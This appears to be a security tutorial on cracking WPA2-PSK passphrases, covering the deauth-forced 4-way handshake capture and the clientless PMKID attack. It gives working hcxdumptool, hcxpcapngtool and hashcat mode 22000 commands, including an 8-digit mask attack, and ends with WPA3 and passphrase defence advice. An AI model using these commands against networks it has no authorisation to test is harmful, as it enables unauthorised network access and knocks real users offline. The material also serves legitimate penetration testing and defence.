What is the difference between the PMKID and handshake attacks?

The handshake attack captures the 4-way EAPOL exchange between a client and the access point, usually by forcing a reconnect with a deauth. The PMKID attack is clientless: it pulls the PMKID straight from the first message in the access point's RSN information element, no connected client required.

What hashcat mode cracks WPA2 now?

Mode 22000. It is the unified WPA mode that replaced the old 2500 (EAPOL) and 16800 (PMKID) modes. Both capture paths produce the same 22000 hashline format, so one mode and one workflow covers both attacks.

Can you crack WPA3 the same way?

No. WPA3 uses SAE (the Dragonfly handshake), which is resistant to offline dictionary attacks. Capturing the exchange does not give you anything to brute force offline, which is the whole reason WPA2 falls and WPA3 does not.

Cracking WPA2: the PMKID attack and the 4-way handshake

WPA2-PSK cracking is an offline dictionary attack against the network passphrase. That is the entire shape of it. You do not break the crypto, you capture a piece of the authentication, take it home, and guess passphrases against it until one produces the right value. Everything else is logistics: how you get the capture, and how you turn it into something hashcat will eat.

There are two capture paths. Both end in the same 22000 hashline.

Path one: the 4-way handshake

When a client joins a WPA2 network, it performs a four-message EAPOL exchange with the access point to derive session keys from the pre-shared key. Capture those messages and you have what you need to attack the EAPOL handshake offline. The catch is timing: you only see the handshake when a client connects, and clients connect when they feel like it.

So you force it. Deauthenticate a connected client, the client reconnects automatically, and you grab the handshake on the way back in. With the hcxdumptool toolchain on a monitor-mode interface:

hcxdumptool -i wlan0 -w capture.pcapng --enable_status=1

hcxdumptool handles the association and deauthentication logic itself when you let it, capturing both PMKIDs and EAPOL frames into one pcapng. The deauth is the noisy part of this attack. It is active, it is detectable by a halfway decent WIDS, and it briefly knocks a real user offline. That is the tradeoff for getting a handshake on demand instead of waiting.

Path two: the clientless PMKID

The PMKID attack is the cleaner one. On many access points, the first message of the handshake (sent by the AP) contains a PMKID in its RSN information element, computed from the PMK, the AP MAC, and the client MAC. You can request association and harvest that PMKID without any client ever connecting, which is why it is called clientless. No deauth, no waiting for a victim, far quieter on the wire.

It does not always work. Some access points do not include the PMKID, and you fall back to the handshake. But when it does, you have everything you need from the AP alone. hcxdumptool collects PMKIDs in the same capture session, so in practice you run one tool and take whichever path the target gives you.

Producing the 22000 format

Raw pcapng is not a hashcat input. You convert it with hcxpcapngtool, which extracts both PMKIDs and EAPOL handshakes into the unified hashline:

hcxpcapngtool -o hash.22000 capture.pcapng

The output lines start with WPA*01* for PMKID and WPA*02* for EAPOL. Both are mode 22000. This unification is the important modern detail: hashcat used to split this into -m 2500 for EAPOL and -m 16800 for PMKID, and both are deprecated. One format, one mode, both attacks.

Cracking with hashcat -m 22000

Point hashcat at the hashline:

hashcat -m 22000 hash.22000 rockyou.txt

This is a dictionary attack and nothing more. You are guessing the passphrase. Everything from the wordlist and rules guide applies directly: rockyou for the first pass, curated lists after, rules to mutate, and a targeted list built from anything you know about the target (the company name, the cafe, the router's default SSID conventions).

The 8-character minimum on WPA2 is the lever that makes pure brute force occasionally viable. A passphrase that is exactly 8 characters has a bounded keyspace, so a mask attack can in principle exhaust it:

hashcat -m 22000 -a 3 hash.22000 ?d?d?d?d?d?d?d?d

That 8-digit mask (think phone numbers, dates spelled as digits) is a genuinely common router default and falls fast. A full 8-character mask across uppercase, lowercase, digits and symbols is a different story: it is technically finite but expensive enough that you would rather have a good wordlist. The practical reality is that most WPA2 passphrases that fall, fall to dictionaries and targeted lists, not to brute force.

Why WPA3 ends this

The reason all of the above works is that WPA2-PSK lets you verify a passphrase guess offline against a captured value. WPA3 closes that door. It uses SAE, the Dragonfly handshake, which is a password-authenticated key exchange. Capturing the exchange gives an attacker nothing to grind offline, because each guess requires a fresh interaction with the access point. No offline dictionary attack, no PMKID to harvest. The entire economy of WPA2 cracking does not exist against SAE.

The defender's move

If you run WPA2 and cannot move to WPA3 yet, the fix is the same as every other slow-hash story: make the passphrase un-guessable. A long, random PSK (not a word, not a phrase a human chose, a genuinely random string well past the 8-character floor) defeats dictionaries and pushes brute force into geological timescales. For anything beyond a home network, drop the shared key entirely and use 802.1X with per-user credentials, so there is no single PSK to capture and crack in the first place. And where you can, move to WPA3 and stop having this conversation.